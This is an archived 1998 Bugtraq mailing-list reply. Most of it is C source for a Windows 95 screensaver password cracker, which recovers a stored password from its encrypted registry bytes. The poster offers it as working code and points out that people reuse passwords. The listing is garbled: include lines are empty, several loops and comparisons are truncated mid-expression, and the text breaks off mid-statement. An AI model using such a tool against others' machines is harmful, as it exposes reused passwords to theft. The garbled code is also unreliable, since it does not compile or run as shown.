Everhart, Glenn From: Ryan Veety [ryan@RYANSPC.COM] Sent: Thursday, May 28, 1998 1:00 PM To: BUGTRAQ@NETSPACE.ORG Subject: Re: Windows95/98(?) Screensavers On May 26, 11:31pm, CrazyLinux wrote: > Subject: Windows95/98(?) Screensavers > > I got the idea to explore a bit on the w95ss password in the registry > after seeing the bruteforce cracker (using tables of bytes). > > (why this is important to bugtraq? loads of people use 1 password for > everything) > > Feel free to recode it in C and post to the list. >-- End of excerpt from CrazyLinux I made this sometime a few months ago, it works. I did not write the original code, I only modified it so the values from RegEdit could be entered. ------------------ CUT HERE ------------------------- // Original code by Lonely Hawk // Modified by Ryan Veety to support both RegEdit and text editor codes. // http://www.ryanspc.com #include #include #include unsigned char matrix[256+2]; unsigned char matrixok[256+2]; unsigned char mystery[4]={ 0xb2, 0xdc, 0x90, 0x8f }; unsigned char h1; unsigned char pa[79], passwd[80]; unsigned char tofind[30]; int h2=4; unsigned int lentofind; int len; void fixmatrix() { unsigned char orig, mys, help1, last; int i,j, help2; for(i=0; i<256; i++) matrix[i]=i; matrix[256]=0; matrix[256+1]=0; h1=0; last=0; for(j=0;j<256;j++) { orig=matrix[j]; mys=mystery[h1]; help2=(mys+last+matrix[j]) & 0xff; help1=matrix[help2]; matrix[j]=help1; matrix[help2]=orig; last=help2; h1++; h1=h1%4; } memcpy(matrixok, matrix, sizeof(matrix)); } void check(char *test) { unsigned char help1, oldh2; int i; strcpy(passwd, test); strcpy(pa, passwd); len=strlen(pa); memcpy(matrix, matrixok, sizeof(matrix)); h1=0; h2=0; for(i=0;i='0')) return 1; else if ((a<='F') && (a>='A')) return 1; else return 0; } int nibble(char c) { if((c>='A') && (c<='F')) return (10+c-'A'); else if((c>='0') && (c<='9')) return (c-'0'); } void parse(char *inpt) { char *tok; char num[2]; lentofind=0; tok=strtok(inpt, "\t ,\n"); while(tok!=NULL) { num[0]=tok[0]; num[1]=tok[1]; if ((!is_ok(num[0])) || (!is_ok(num[1]))) { puts("Please input strings like: a1,b1,05,c3,d2,f3"); exit(0); } tofind[lentofind++]=16*nibble(num[0])+nibble(num[1]); tok=strtok(NULL, "\t ,\n"); } tofind[lentofind]=0; } int hex(char *str) { return (str[0]-'0')*16+(str[1]-'0'); } void main() { unsigned int i; int j,found=0,n=0,odd=0; unsigned char tst[80]; char inpt[120]; char ascii[120]; char temp[3]; char ans; fixmatrix(); printf("Windows 95 Screen Saver Cracker.\nMade by Lonely Hawk.\n"); printf("Modified by Ryan Veety http://ryanspc.nws.net\n"); printf("It now allows both hex and ascii inputs.\n"); printf("Ascii codes come from RegEdit and hex codes come from a text editor\n\n"); do { printf("Are the codes hex or ascii [h/a]?"); ans = getchar(); getchar(); } while(tolower(ans) != 'h' && tolower(ans) != 'a'); if(tolower(ans) == 'a') { printf("Give me the codes, separated by commas (in ascii):\n >"); gets(ascii); i=0; do { temp[0]=ascii[i]; temp[1]=ascii[i+1]; temp[2]=NULL; inpt[n]=hex(temp); n++; odd++; if(odd % 2 == 0 && i+3<=strlen(ascii)) { inpt[n]=','; n++; } i+=3; }while(i<=strlen(ascii)); inpt[n]=NULL; printf("The hex codes for the password are: %s\n", inpt); } else { printf("Give me the codes, separated by commas (in hex):\n >"); gets(inpt); } for(i=0;i